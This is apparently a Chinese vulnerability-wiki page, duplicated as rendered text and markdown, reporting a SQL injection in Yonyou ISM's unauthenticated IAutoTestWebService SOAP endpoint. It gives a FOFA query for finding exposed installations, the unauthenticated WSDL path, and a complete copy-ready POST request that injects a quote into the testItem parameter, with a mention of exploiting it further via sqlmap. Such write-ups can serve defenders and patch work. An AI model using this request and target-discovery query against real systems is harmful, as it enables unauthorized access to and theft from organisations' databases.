fofamini-wiki

登录白背景

源码

用友ism queryRFTScriptData参数存在SQL注入漏洞

一、漏洞简介

用友ism存在wsdl未授权接口信息泄露，对wsdl进行解析xml，发现/uapws/service/nc.itf.sdp.web.autotest.IAutoTestWebService?wsdl接口中的queryRFTScriptData参数存在sql注入漏洞。

二、影响版本

用友ism

三、资产测绘

fofaapp="用友-ism"

特征

四、漏洞复现

未授权接口

/uapws/service/nc.itf.sdp.web.autotest.IAutoTestWebService?wsdl

testItem参数存在sql注入

POST /uapws/service/nc.itf.sdp.web.autotest.IAutoTestWebService HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: JSESSIONID=CD455D10BBE0F87FB8D6D6CEED880D58.server
Upgrade-Insecure-Requests: 1
SOAPAction: urn:queryRFTScriptData
Content-Type: text/xml;charset=UTF-8
Host: xx.xx.xx.xx
Content-Length: 739

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iaut="http://autotest.web.sdp.itf.nc/IAutoTestWebService">
   <soapenv:Header/>
   <soapenv:Body>
      <iaut:queryRFTScriptData>
         <queryInfo>
            <!--type: string-->
            <testItem>gero et'</testItem>
            <!--type: string-->
            <moduleName>sonoras imperio</moduleName>
            <!--type: string-->
            <versionCode>quae divum incedo</versionCode>
            <!--type: string-->
            <devfield>verrantque per auras</devfield>
            <!--type: string-->
            <testerCode>per auras</testerCode>
         </queryInfo>
      </iaut:queryRFTScriptData>
   </soapenv:Body>
</soapenv:Envelope>

sqlmap

原文: https://www.yuque.com/xiaokp7/ocvun2/cbghg2dgwi8ibm7y

# 用友ism queryRFTScriptData参数存在SQL注入漏洞

# 一、漏洞简介
用友ism存在wsdl未授权接口信息泄露，对wsdl进行解析xml，发现/uapws/service/nc.itf.sdp.web.autotest.IAutoTestWebService?wsdl接口中的queryRFTScriptData参数存在sql注入漏洞。

# 二、影响版本

- 用友ism

# 三、资产测绘

- fofa`app="用友-ism"`

![image.png](./img/-V0FaA6gXV6DgFQB/1695796855025-f1d5d6cf-ce3f-4cef-a7ac-5d9ff7f20cc9-009622.png)

- 特征

![image.png](./img/-V0FaA6gXV6DgFQB/1695796876487-96383ba5-3e25-4c2b-a308-599485350280-696635.png)

# 四、漏洞复现
未授权接口
```
/uapws/service/nc.itf.sdp.web.autotest.IAutoTestWebService?wsdl
```
![image.png](./img/-V0FaA6gXV6DgFQB/1695796958348-ced017a8-efae-4dbc-92e0-40de577ef40c-337636.png)
testItem参数存在sql注入
```
POST /uapws/service/nc.itf.sdp.web.autotest.IAutoTestWebService HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: JSESSIONID=CD455D10BBE0F87FB8D6D6CEED880D58.server
Upgrade-Insecure-Requests: 1
SOAPAction: urn:queryRFTScriptData
Content-Type: text/xml;charset=UTF-8
Host: xx.xx.xx.xx
Content-Length: 739

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iaut="http://autotest.web.sdp.itf.nc/IAutoTestWebService">
   <soapenv:Header/>
   <soapenv:Body>
      <iaut:queryRFTScriptData>
         <queryInfo>
            
            <testItem>gero et'</testItem>
            
            <moduleName>sonoras imperio</moduleName>
            
            <versionCode>quae divum incedo</versionCode>
            
            <devfield>verrantque per auras</devfield>
            
            <testerCode>per auras</testerCode>
         </queryInfo>
      </iaut:queryRFTScriptData>
   </soapenv:Body>
</soapenv:Envelope>
```
![image.png](./img/-V0FaA6gXV6DgFQB/1695797002578-a41dd37d-5ff8-4bc1-bb32-4db5b88a93d1-933248.png)
sqlmap
![image.png](./img/-V0FaA6gXV6DgFQB/1695797061264-2e6196fe-af3e-4a14-a685-c61e7973e2ec-410198.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/cbghg2dgwi8ibm7y>